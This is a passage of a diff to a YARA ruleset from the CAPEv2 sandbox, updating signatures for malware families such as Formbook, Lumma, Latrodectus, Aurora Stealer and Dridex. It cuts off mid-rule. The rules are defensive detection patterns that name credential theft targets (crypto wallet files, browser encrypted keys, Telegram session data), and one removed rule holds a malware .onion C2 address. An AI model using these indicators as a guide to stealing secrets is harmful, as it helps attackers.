"https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" logic_hash = "2699ef93ae10b205b79025098afc1d1cfe7dbdf192f4d98a6e34a8f3de154810" score = 75 quality = 62 @@ -112487,734 +114283,710 @@ rule CAPE_Asyncrat_Kingrat condition: ( not any of ($dcrat*)) and 6 of them and #patt_config>=10 } -rule CAPE_Varenyky : FILE +rule CAPE_Rcsession { meta: - description = "Varenyky Payload" + description = "RCSession Payload" author = "kevoreilly" - id = "e01695fa-72a0-5d8e-86ab-8c909d28b8ec" + id = "841e6bd1-4f09-54dc-8dec-2e9423a34003" date = "2019-10-30" modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Varenyky.yar#L1-L11" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "602f1b8b60b29565eabe2171fde4eb58546af68f8acecad402a7a51ea9a08ed9" - score = 75 - quality = 70 - tags = "FILE" - cape_type = "Varenyky Payload" - - strings: - $onion = "jg4rli4xoagvvmw47fr2bnnfu7t2epj6owrgyoee7daoh4gxvbt3bhyd.onion" - - condition: - uint16(0)==0x5A4D and ($onion) -} -rule CAPE_Latrodectus -{ - meta: - description = "Latrodectus Payload" - author = "enzok" - id = "5fe6ddad-3252-5f49-9359-bd647b974fe6" - date = "2024-09-03" - modified = "2024-09-03" - reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Latrodectus.yar#L1-L16" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - hash = "a547cff9991a713535e5c128a0711ca68acf9298cc2220c4ea0685d580f36811" - logic_hash = "2f98d570bf9a490eecd2807599b93023ccacab86f3b7674f0118bbebd4dd2776" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/RCSession.yar#L1-L12" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "ebd1e9e615a91c35b36332cad55519607323469df738cec4464288b45787630d" score = 75 quality = 70 tags = "" - cape_type = "Latrodectus Payload" + cape_type = "RCSession Payload" strings: - $fnvhash1 = {C7 04 24 C5 9D 1C 81 48 8B 44 24 20 48 89 44 24 08} - $fnvhash2 = {8B 0C 24 33 C8 8B C1 89 04 24 69 04 24 93 01 00 01} - $procchk1 = {E8 [3] FF 85 C0 74 [2] FF FF FF FF E9 [4] E8 [4] 89 44 24 ?? E8 [4] 83 F8 4B 73 ?? 83 [3] 06} - $procchk2 = {72 [2] FF FF FF FF E9 [4] E8 [4] 83 F8 32 73 ?? 83 [3] 06} - $version = {C7 44 2? ?? 0? 00 00 00 C7 44 2? ?? 0? 00 00 00 C7 44 2? ?? 01 00 00 00 8B} + $a1 = {56 33 F6 39 74 24 08 7E 4C 53 57 8B F8 2B FA 8B C6 25 03 00 00 80 79 05 48 83 C8 FC 40 83 E8 00 74 19 48 74 0F 48 74 05 6B C9 09 EB 15 8B C1 C1 E8 02 EB 03 8D 04 09 2B C8} + $a2 = {83 C4 10 85 C0 74 ?? BE ?? ?? ?? ?? 89 74 24 10 E8 ?? ?? ?? ?? 6A 03 68 48 0B 00 00 56 53 57 68 02 00 00 80 E8 ?? ?? ?? ?? 83 C4 18 85 C0 74 18 E8 ?? ?? ?? ?? 6A 03 68 48} condition: - all of them + ( any of ($a*)) } -rule CAPE_Latrodectus_AES +rule CAPE_Formbook { meta: - description = "Latrodectus Payload" - author = "enzok" - id = "8a3dd88c-7840-54a3-8844-4e1a38f51df5" - date = "2024-09-03" - modified = "2024-09-03" + description = "Formbook Payload" + author = "kevoreilly" + id = "3389c0a7-eb86-5465-8a14-63f812d257db" + date = "2023-10-13" + modified = "2023-10-13" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Latrodectus.yar#L18-L34" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - hash = "5cecb26a3f33c24b92a0c8f6f5175da0664b21d7c4216a41694e4a4cad233ca8" - logic_hash = "1f00f6f187f15d39a30e15ffd14dae07707141999271ad4ac6a75ff4d93dd54d" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Formbook.yar#L1-L18" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "63ee4dd6fe5ed2a3e5ee88ba7de48d2c9e0024961a550d0fdb68891c9885e05e" score = 75 quality = 70 tags = "" - cape_type = "Latrodectus Payload" + cape_type = "Formbook Payload" + packed = "9e38c0c3c516583da526016c4c6a671c53333d3d156562717db79eac63587522" + packed = "2379a4e1ccdd7849ad7ea9e11ee55b2052e58dda4628cd4e28c3378de503de23" strings: - $fnvhash1 = {C7 04 24 C5 9D 1C 81 48 8B 44 24 20 48 89 44 24 08} - $fnvhash2 = {8B 0C 24 33 C8 8B C1 89 04 24 69 04 24 93 01 00 01} - $key = {C6 44 2? ?? ?? [150] C6 44 2? ?? ?? B8 02} - $aes_ctr_1 = {8B 44 24 ?? FF C8 89 44 24 ?? 83 7C 24 ?? 00 7C ?? 4? 63 44 24 ?? 4? 8B 4C 24 ?? 0F B6 84 01 F0 00 00 00 3D FF 00 00 00} - $aes_ctr_2 = {48 03 C8 48 8B C1 0F B6 ?? 48 63 4C 24 ?? 0F B6 4C 0C ?? 33 C1 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 03 D1 48 8B CA 88 01} - $version = {C7 44 2? ?? 0? 00 00 00 C7 44 2? ?? 0? 00 00 00 C7 44 2? ?? 01 00 00 00 8B} + $remap_ntdll = {33 56 0? 8D 86 [2] 00 00 68 F0 00 00 00 50 89 56 ?? E8 [4] 8B [1-5] 6A 00 6A 04 8D 4D ?? 51 6A 07 52 56 E8 [4] 8B 45 ?? 83 C4 20 3B} + $rc4dec = {F7 E9 C1 FA 03 8B C2 C1 E8 1F 03 C2 8D 04 80 03 C0 03 C0 8B D1 2B D0 8A 04 3A 88 8C 0D [4] 88 84 0D [4] 41 81 F9 00 01 00 00 7C} + $decrypt = {8A 50 01 28 10 48 49 75 F7 83 FE 01 76 14 8B C7 8D 4E FF 8D 9B 00 00 00 00 8A 50 01 28 10 40 49 75 F7} + $string = {33 C0 66 39 01 74 0B 8D 49 00 40 66 83 3C 41 00 75 F8 8B 55 0C 8D 44 00 02 50 52 51 E8} + $mutant = {64 A1 18 00 00 00 8B 40 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 8B E5 5D C3} + $postmsg = {8B 7D 0C 6A 00 6A 00 68 11 01 00 00 57 FF D6 85 C0 75 ?? 50} condition: - all of them + 2 of them } -rule CAPE_Remcos : FILE +rule CAPE_Lumma_1 : FILE { meta: - description = "Remcos Payload" + description = "Lumma Payload" author = "kevoreilly" - id = "f77295ca-02d5-5b2c-80b8-b6566610bff8" - date = "2022-05-10" - modified = "2022-05-10" + id = "334807ca-8548-5219-8614-7c922368e276" + date = "2024-03-13" + modified = "2024-03-13" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Remcos.yar#L1-L14" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "38142e784ad437d9592353b924f74777bb62e5ed176c811230a2021a437d4710" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Lumma.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "5b172496e2488cc3e9cdbd5a08229c3691bafba2fcdbdfd2805c7ac58f9c5751" score = 75 - quality = 68 + quality = 70 tags = "FILE" - cape_type = "Remcos Payload" + cape_type = "Lumma Payload" + packed = "0ee580f0127b821f4f1e7c032cf76475df9724a9fade2e153a69849f652045f8" strings: - $name = "Remcos" nocase - $time = "%02i:%02i:%02i:%03i" - $crypto1 = {81 E1 FF 00 00 80 79 ?? 4? 81 C9 00 FF FF FF 4? 8A ?4 8?} - $crypto2 = {0F B6 [1-7] 8B 45 08 [0-2] 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 ?? ?? FF FF 30 06 47 3B 7D 0C 72} + $c2 = {8D 44 24 ?? 50 89 4C 24 ?? FF 31 E8 [4] 83 C4 08 B8 FF FF FF FF} + $peb = {8B 44 24 04 85 C0 74 13 64 8B 0D 30 00 00 00 50 6A 00 FF 71 18 FF 15} + $remap = {C6 44 24 20 00 C7 44 24 1C C2 00 00 90 C7 44 24 18 00 00 FF D2 C7 44 24 14 00 BA 00 00 C7 44 24 10 B8 00 00 00 8B ?? 89 44 24 11} condition: - uint16(0)==0x5A4D and ($name) and ($time) and any of ($crypto*) + uint16(0)==0x5a4d and any of them } -rule CAPE_Bitpaymer : FILE +rule CAPE_Masslogger : FILE { meta: - description = "BitPaymer Payload" + description = "MassLogger" author = "kevoreilly" - id = "c139b514-a1ba-5d47-8f4d-8e60cddfe2ba" - date = "2019-11-27" - modified = "2019-11-27" + id = "0743421a-36f7-5b7c-859f-b461511151cb" + date = "2020-11-24" + modified = "2020-11-24" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/BitPaymer.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "6ae0dc9a36da13e483d8d653276b06f59ecc15c95c754c268dcc91b181677c4c" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/MassLogger.yar#L1-L12" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "c8d82694810aafbdc6a35a661e7431e9536035e2f7fef90b9359064c4209b66c" score = 75 quality = 70 tags = "FILE" - cape_type = "BitPaymer Payload" + cape_type = "MassLogger Payload" strings: - $decrypt32 = {6A 40 58 3B C8 0F 4D C1 39 46 04 7D 50 53 57 8B F8 81 E7 3F 00 00 80 79 05 4F 83 CF C0 47 F7 DF 99 1B FF 83 E2 3F 03 C2 F7 DF C1 F8 06 03 F8 C1 E7 06 57} - $antidefender = "TouchMeNot" wide + $name = "MassLogger" + $fody = "Costura" condition: - uint16(0)==0x5A4D and all of them + uint16(0)==0x5A4D and 2 of them } -rule CAPE_Emotetloader : FILE +rule CAPE_Aurorastealer : FILE { meta: - description = "Emotet Loader" - author = "kevoreilly" - id = "aea8ff2e-bdf7-5417-a41c-93566d1dd019" - date = "2022-05-31" - modified = "2022-05-31" + description = "detects Aurora Stealer samples" + author = "Johannes Bader @viql" + id = "07779318-3e5d-5e67-8c04-f3f70d7e48b7" + date = "2022-12-14" + modified = "2023-03-31" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/EmotetLoader.yar#L1-L12" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "410872d25ed3a89a2cba108f952d606cd1c3bf9ccc89ae6ab3377b83665c2773" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/AuroraStealer.yar#L1-L74" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "0d10e9268184f494a73d5b4ab0d9a478ad0c26d2ef13d5134f8c9769f028b8f5" score = 75 - quality = 70 + quality = 45 tags = "FILE" - cape_type = "EmotetLoader Payload" + version = "v1.0" + tlp = "TLP:WHITE" + malpedia_family = "win.aurora_stealer" + hash1_md5 = "51c153501e991f6ce4901e6d9578d0c8" + hash1_sha1 = "3816f17052b28603855bde3e57db77a8455bdea4" + hash1_sha256 = "c148c449e1f6c4c53a7278090453d935d1ab71c3e8b69511f98993b6057f612d" + hash2_md5 = "65692e1d5b98225dbfb1b6b2b8935689" + hash2_sha1 = "0b51765c175954c9e47c39309e020bcb0f90b783" + hash2_sha256 = "5a42aa4fc8180c7489ce54d7a43f19d49136bd15ed7decf81f6e9e638bdaee2b" + cape_type = "AuroraStealer Payload" strings: - $antihook = {8B 15 ?? ?? ?? ?? 03 15 ?? ?? ?? ?? 89 95 28 FF FF FF A1 ?? ?? ?? ?? 2D 4D 01 00 00 A3 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 3B 0D ?? ?? ?? ?? 76 26 8B 95 18 FF FF FF 8B 42 38} + $str_func_01 = "main.(*DATA_BLOB).ToByteArray" + $str_func_02 = "main.Base64Encode" + $str_func_03 = "main.Capture" + $str_func_04 = "main.CaptureRect" + $str_func_05 = "main.ConnectToServer" + $str_func_06 = "main.CreateImage" + $str_func_07 = "main.FileExsist" + $str_func_08 = "main.GetDisplayBounds" + $str_func_09 = "main.GetInfoUser" + $str_func_10 = "main.GetOS" + $str_func_11 = "main.Grab" + $str_func_12 = "main.MachineID" + $str_func_13 = "main.NewBlob" + $str_func_14 = "main.NumActiveDisplays" + $str_func_15 = "main.PathTrans" + $str_func_16 = "main.SendToServer_NEW" + $str_func_17 = "main.SetUsermame" + $str_func_18 = "main.Zip" + $str_func_19 = "main.base64Decode" + $str_func_20 = "main.countupMonitorCallback" + $str_func_21 = "main.enumDisplayMonitors" + $str_func_22 = "main.getCPU" + $str_func_23 = "main.getDesktopWindow" + $str_func_24 = "main.getGPU" + $str_func_25 = "main.getMasterKey" + $str_func_26 = "main.getMonitorBoundsCallback" + $str_func_27 = "main.getMonitorRealSize" + $str_func_28 = "main.sysTotalMemory" + $str_func_29 = "main.xDecrypt" + $str_type_01 = "type..eq.main.Browser_G" + $str_type_02 = "type..eq.main.STRUSER" + $str_type_03 = "type..eq.main.Telegram_G" + $str_type_04 = "type..eq.main.Crypto_G" + $str_type_05 = "type..eq.main.ScreenShot_G" + $str_type_06 = "type..eq.main.FileGrabber_G" + $str_type_07 = "type..eq.main.FTP_G" + $str_type_08 = "type..eq.main.Steam_G" + $str_type_09 = "type..eq.main.DATA_BLOB" + $str_type_10 = "type..eq.main.Grabber" + $varia_01 = "\\User Data\\Local State" + $varia_02 = "\\\\Opera Stable\\\\Local State" + $varia_03 = "Reconnect 1" + $varia_04 = "@ftmone" + $varia_05 = "^user^" + $varia_06 = "wmic path win32_VideoController get name" + $varia_07 = "\\AppData\\Roaming\\Telegram Desktop\\tdata" + $varia_08 = "C:\\Windows.old\\Users\\" + $varia_09 = "ScreenShot" + $varia_10 = "Crypto" condition: - uint16(0)==0x5A4D and any of them + uint16(0)==0x5A4D and (32 of ($str_*) or 9 of ($varia_*)) } -rule CAPE_Vidar : FILE +rule CAPE_Dridexloader_1 : FILE { meta: - description = "Vidar Payload" - author = "kevoreilly,rony" - id = "9e4e797f-880e-54eb-ad44-caad0ec5683c" - date = "2023-04-21" - modified = "2023-04-21" + description = "Dridex v4 dropper C2 parsing function" + author = "kevoreilly" + id = "43bd9631-4611-567c-bee5-d926e060b977" + date = "2021-03-10" + modified = "2021-03-10" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Vidar.yar#L1-L22" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "5d4c030536ed41cf4e0dcb77b2fe4553d789ee2b8095a4b3e050692335a8709d" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/DridexLoader.yar#L1-L17" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "20696b1f14539c8ecf21bffc696596040c20b1ee2fcedc173945482c0baca588" score = 75 quality = 70 tags = "FILE" - cape_type = "Vidar Payload" - packed = "0cff8404e73906f3a4932e145bf57fae7a0e66a7d7952416161a5d9bb9752fd8" + cape_type = "DridexLoader Payload" strings: - $decode = {FF 75 0C 8D 34 1F FF 15 ?? ?? ?? ?? 8B C8 33 D2 8B C7 F7 F1 8B 45 0C 8B 4D 08 8A 04 02 32 04 31 47 88 06 3B 7D 10 72 D8} - $xor_dec = {0F B6 [0-5] C1 E? ?? 33 ?? 81 E? [0-5] 89 ?? 7C AF 06} - $wallet = "*wallet*.dat" fullword ascii wide - $s1 = "\"os_crypt\":{\"encrypted_key\":\"" fullword ascii wide - $s2 = "screenshot.jpg" fullword ascii wide - $s3 = "\\Local State" fullword ascii wide - $s4 = "Content-Disposition: form-data; name=\"" fullword ascii wide - $s5 = "CC\\%s_%s.txt" fullword ascii wide - $s6 = "History\\%s_%s.txt" fullword ascii wide - $s7 = "Autofill\\%s_%s.txt" fullword ascii wide - $s8 = "Downloads\\%s_%s.txt" fullword ascii wide + $c2parse_1 = {57 0F 95 C0 89 35 [4] 88 46 04 33 FF 80 3D [4] 00 76 54 8B 04 FD [4] 8D 4D EC 83 65 F4 00 89 45 EC 66 8B 04 FD [4] 66 89 45 F0 8D 45 F8 50} + $c2parse_2 = {89 45 00 0F B7 53 04 89 10 0F B6 4B 0C 83 F9 0A 7F 03 8A 53 0C 0F B6 53 0C 85 D2 7E B7 8D 74 24 0C C7 44 24 08 00 00 00 00 8D 04 7F 8D 8C 00} + $c2parse_3 = {89 08 66 39 1D [4] A1 [4] 0F 95 C1 88 48 04 80 3D [4] 0A 77 05 A0 [4] 80 3D [4] 00 56 8B F3 76 4E 66 8B 04 F5} + $c2parse_4 = {0F B7 C0 89 01 A0 [4] 3C 0A 77 ?? A0 [4] A0 [4] 57 33 FF 84 C0 74 ?? 56 BE} + $c2parse_5 = {0F B7 05 [4] 89 02 89 15 [4] 0F B6 15 [4] 83 FA 0A 7F 07 0F B6 05 [4] 0F B6 05 [4] 85 C0} + $c2parse_6 = {0F B7 53 ?? 89 10 0F B6 4B ?? 83 F9 0A 7F 03 8A 53 ?? 0F B6 53 ?? 85 D2 7E B9} condition: - uint16be(0)==0x4d5a and 6 of them + uint16(0)==0x5A4D and any of them } -rule CAPE_Rcsession +rule CAPE_Latrodectus_1 { meta: - description = "RCSession Payload" - author = "kevoreilly" - id = "841e6bd1-4f09-54dc-8dec-2e9423a34003" - date = "2019-10-30" - modified = "2019-10-30" + description = "Latrodectus Payload" + author = "enzok" + id = "5fe6ddad-3252-5f49-9359-bd647b974fe6" + date = "2024-09-03" + modified = "2024-09-03" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/RCSession.yar#L1-L12" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "ebd1e9e615a91c35b36332cad55519607323469df738cec4464288b45787630d" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Latrodectus.yar#L1-L16" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "a547cff9991a713535e5c128a0711ca68acf9298cc2220c4ea0685d580f36811" + logic_hash = "2f98d570bf9a490eecd2807599b93023ccacab86f3b7674f0118bbebd4dd2776" score = 75 quality = 70 tags = "" - cape_type = "RCSession Payload" + cape_type = "Latrodectus Payload" strings: - $a1 = {56 33 F6 39 74 24 08 7E 4C 53 57 8B F8 2B FA 8B C6 25 03 00 00 80 79 05 48 83 C8 FC 40 83 E8 00 74 19 48 74 0F 48 74 05 6B C9 09 EB 15 8B C1 C1 E8 02 EB 03 8D 04 09 2B C8} - $a2 = {83 C4 10 85 C0 74 ?? BE ?? ?? ?? ?? 89 74 24 10 E8 ?? ?? ?? ?? 6A 03 68 48 0B 00 00 56 53 57 68 02 00 00 80 E8 ?? ?? ?? ?? 83 C4 18 85 C0 74 18 E8 ?? ?? ?? ?? 6A 03 68 48} + $fnvhash1 = {C7 04 24 C5 9D 1C 81 48 8B 44 24 20 48 89 44 24 08} + $fnvhash2 = {8B 0C 24 33 C8 8B C1 89 04 24 69 04 24 93 01 00 01} + $procchk1 = {E8 [3] FF 85 C0 74 [2] FF FF FF FF E9 [4] E8 [4] 89 44 24 ?? E8 [4] 83 F8 4B 73 ?? 83 [3] 06} + $procchk2 = {72 [2] FF FF FF FF E9 [4] E8 [4] 83 F8 32 73 ?? 83 [3] 06} + $version = {C7 44 2? ?? 0? 00 00 00 C7 44 2? ?? 0? 00 00 00 C7 44 2? ?? 01 00 00 00 8B} condition: - ( any of ($a*)) + all of them } -rule CAPE_Formbook +rule CAPE_Latrodectus_AES { meta: - description = "Formbook Payload" - author = "kevoreilly" - id = "3389c0a7-eb86-5465-8a14-63f812d257db" - date = "2023-10-13" - modified = "2023-10-13" + description = "Latrodectus Payload" + author = "enzok" + id = "8a3dd88c-7840-54a3-8844-4e1a38f51df5" + date = "2024-09-03" + modified = "2024-09-03" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Formbook.yar#L1-L18" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "63ee4dd6fe5ed2a3e5ee88ba7de48d2c9e0024961a550d0fdb68891c9885e05e" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Latrodectus.yar#L18-L34" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "5cecb26a3f33c24b92a0c8f6f5175da0664b21d7c4216a41694e4a4cad233ca8" + logic_hash = "1f00f6f187f15d39a30e15ffd14dae07707141999271ad4ac6a75ff4d93dd54d" score = 75 quality = 70 tags = "" - cape_type = "Formbook Payload" - packed = "9e38c0c3c516583da526016c4c6a671c53333d3d156562717db79eac63587522" - packed = "2379a4e1ccdd7849ad7ea9e11ee55b2052e58dda4628cd4e28c3378de503de23" + cape_type = "Latrodectus Payload" strings: - $remap_ntdll = {33 56 0? 8D 86 [2] 00 00 68 F0 00 00 00 50 89 56 ?? E8 [4] 8B [1-5] 6A 00 6A 04 8D 4D ?? 51 6A 07 52 56 E8 [4] 8B 45 ?? 83 C4 20 3B} - $rc4dec = {F7 E9 C1 FA 03 8B C2 C1 E8 1F 03 C2 8D 04 80 03 C0 03 C0 8B D1 2B D0 8A 04 3A 88 8C 0D [4] 88 84 0D [4] 41 81 F9 00 01 00 00 7C} - $decrypt = {8A 50 01 28 10 48 49 75 F7 83 FE 01 76 14 8B C7 8D 4E FF 8D 9B 00 00 00 00 8A 50 01 28 10 40 49 75 F7} - $string = {33 C0 66 39 01 74 0B 8D 49 00 40 66 83 3C 41 00 75 F8 8B 55 0C 8D 44 00 02 50 52 51 E8} - $mutant = {64 A1 18 00 00 00 8B 40 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 8B E5 5D C3} - $postmsg = {8B 7D 0C 6A 00 6A 00 68 11 01 00 00 57 FF D6 85 C0 75 ?? 50} + $fnvhash1 = {C7 04 24 C5 9D 1C 81 48 8B 44 24 20 48 89 44 24 08} + $fnvhash2 = {8B 0C 24 33 C8 8B C1 89 04 24 69 04 24 93 01 00 01} + $key = {C6 44 2? ?? ?? [150] C6 44 2? ?? ?? B8 02} + $aes_ctr_1 = {8B 44 24 ?? FF C8 89 44 24 ?? 83 7C 24 ?? 00 7C ?? 4? 63 44 24 ?? 4? 8B 4C 24 ?? 0F B6 84 01 F0 00 00 00 3D FF 00 00 00} + $aes_ctr_2 = {48 03 C8 48 8B C1 0F B6 ?? 48 63 4C 24 ?? 0F B6 4C 0C ?? 33 C1 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 03 D1 48 8B CA 88 01} + $version = {C7 44 2? ?? 0? 00 00 00 C7 44 2? ?? 0? 00 00 00 C7 44 2? ?? 01 00 00 00 8B} condition: - 2 of them + all of them } -import "pe" - -rule CAPE_Nighthawk +rule CAPE_Oyster { meta: - description = "NightHawk C2" - author = "Nikhil Ashok Hegde <@ka1do9>" - id = "096b9d13-6aa7-5b6e-aaeb-e25aa7c8c53f" - date = "2022-12-05" - modified = "2022-12-05" + description = "Oyster Payload" + author = "enzok" + id = "29443d00-e3de-53fd-b617-df470a30e805" + date = "2024-05-30" + modified = "2024-05-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Nighthawk.yar#L3-L24" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "2d77912678e06503ffef0e8ed84aa4f9ac74357480d57742fbae619acebfb5f2" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Oyster.yar#L1-L19" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "8bae0fa9f589cd434a689eebd7a1fde949cc09e6a65e1b56bb620998246a1650" + logic_hash = "23ab1518712dbce8319b87785d7ffc0c2b61de82c2bbf533ebf0aae39ec33540" score = 75 quality = 70 tags = "" - cape_type = "Nighthawk Payload" + cape_type = "Oyster Payload" strings: - $keying_methods = { 85 C9 74 43 83 E9 01 74 1C 83 F9 01 0F 85 } - $aes_sbox = { 63 7C 77 7B F2 6B 6F C5 30 } - $aes_inv_sbox = { 52 09 6A D5 30 36 A5 38 BF } + $start_exit = {(05 | 00) 00 00 00 2E 96 1E A6} + $content_type = {F6 CE 56 F4 76 F6 96 2E 86 C6 96 36 0E 0E 86 04 5C A6 0E 9E 2A B4 2E 76 A6 2E 76 F6 C2} + $domain = {44 5C 44 76 96 86 B6 F6 26 44 34 44} + $id = {44 5C 44 64 96 44 DE} + $ip_local = {44 5C 44 36 86 C6 F6 36 FA 0E 96 44 34 44} + $table_part_1 = {00 80 40 C0 20 A0 60 E0 10 90 50 D0 30 B0 70 F0 08 88 48 C8 28 A8 68} + $table_part_2 = {97 57 D7 37 B7 77 F7 0F 8F 4F CF 2F AF 6F EF 1F 9F 5F DF 3F BF 7F FF} + $decode = {0F B6 0? 8D ?? FF 8A [2] 0F B6 80 [4] 88 04 ?? 46 0F B6 C? 0F B6 80 [4] 88 4? 01 3B F7} condition: - pe.is_pe and for any s in pe.sections : (s.name==".profile") and all of them + 4 of them } -rule CAPE_Lokibot : FILE +rule CAPE_Eternalromance : FILE { meta: - description = "LokiBot Payload" + description = "EternalRomance Exploit" author = "kevoreilly" - id = "8cdf69e2-ecac-5241-adba-c458cce0610f" - date = "2022-02-01" - modified = "2022-02-01" + id = "34035076-9dda-5e32-bd0b-d0257a96329b" + date = "2022-06-09" + modified = "2022-06-09" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/LokiBot.yar#L1-L12" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "a5b3d518371138740e913d2d6ce4fa22d3da5cea7e034c7d6b4b502e6bf44b06" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/EternalRomance.yar#L1-L33" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "5390fae3e2411a715cdc965df8648c0c4c511d53d5f76031714f1b784b58eb0d" score = 75 - quality = 70 + quality = 68 tags = "FILE" - cape_type = "LokiBot Payload" + cape_type = "EternalRomance Exploit" strings: - $a1 = "DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW" - $a2 = "last_compatible_version" + $SMB1 = "Frag" + $SMB2 = "Free" + $session7_32_1 = {2A 02 1C 00} + $session7_64_1 = {2A 02 28 00} + $session8_32_1 = {2A 02 24 00} + $session8_64_1 = {2A 02 38 00} + $session7_32_2 = {D5 FD E3 